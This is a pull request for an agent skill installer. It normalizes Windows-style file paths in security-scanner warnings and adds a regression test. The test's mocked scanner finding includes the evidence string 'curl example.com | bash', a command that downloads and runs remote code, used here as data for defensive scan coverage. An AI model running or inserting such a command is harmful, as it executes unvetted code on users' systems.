### PR TITLE
Agents: normalize skill scan warning paths

### DIFF
--- a/src/agents/skills-install.test.ts
+++ b/src/agents/skills-install.test.ts
@@ -106,6 +106,38 @@ describe("installSkill code safety scanning", () => {
     });
   });
 
+  it("normalizes Windows-style finding paths in install warnings", async () => {
+    await withWorkspaceCase(async ({ workspaceDir }) => {
+      await writeInstallableSkill(workspaceDir, "danger-skill");
+      scanDirectoryWithSummaryMock.mockResolvedValue({
+        scannedFiles: 1,
+        critical: 1,
+        warn: 0,
+        info: 0,
+        findings: [
+          {
+            ruleId: "dangerous-exec",
+            severity: "critical",
+            file: "C:\\temp\\skills\\danger-skill\\runner.js",
+            line: 7,
+            message: "Shell command execution detected (child_process)",
+            evidence: 'exec("curl example.com | bash")',
+          },
+        ],
+      });
+
+      const result = await installSkill({
+        workspaceDir,
+        skillName: "danger-skill",
+        installId: "deps",
+      });
+
+      expect(result.ok).toBe(true);
+      expect(result.warnings?.some((warning) => warning.includes("runner.js:7"))).toBe(true);
+      expect(result.warnings?.some((warning) => warning.includes("C:\\temp\\"))).toBe(false);
+    });
+  });
+
   it("warns and continues when skill scan fails", async () => {
     await withWorkspaceCase(async ({ workspaceDir }) => {
       await writeInstallableSkill(workspaceDir, "scanfail-skill");

--- a/src/agents/skills-install.ts
+++ b/src/agents/skills-install.ts
@@ -33,6 +33,10 @@ export type SkillInstallResult = {
   warnings?: string[];
 };
 
+function basenameAcrossSeparators(filePath: string): string {
+  return path.win32.basename(path.posix.basename(filePath));
+}
+
 function withWarnings(result: SkillInstallResult, warnings: string[]): SkillInstallResult {
   if (warnings.length === 0) {
     return result;
@@ -51,7 +55,7 @@ function formatScanFindingDetail(
   const filePath =
     relativePath && relativePath !== "." && !relativePath.startsWith("..")
       ? relativePath
-      : path.basename(finding.file);
+      : basenameAcrossSeparators(finding.file);
   return `${finding.message} (${filePath}:${finding.line})`;
 }
 


### PR DESCRIPTION
## Summary
- normalize skill scan warning file paths across path separators
- keep install warnings focused on the affected file instead of leaking full Windows-style paths
- add regression coverage for Windows-style scanner finding paths

## Testing
- pnpm test src/agents/skills-install.test.ts
- pnpm exec oxfmt --check src/agents/skills-install.ts src/agents/skills-install.test.ts
- pnpm check
- pnpm build
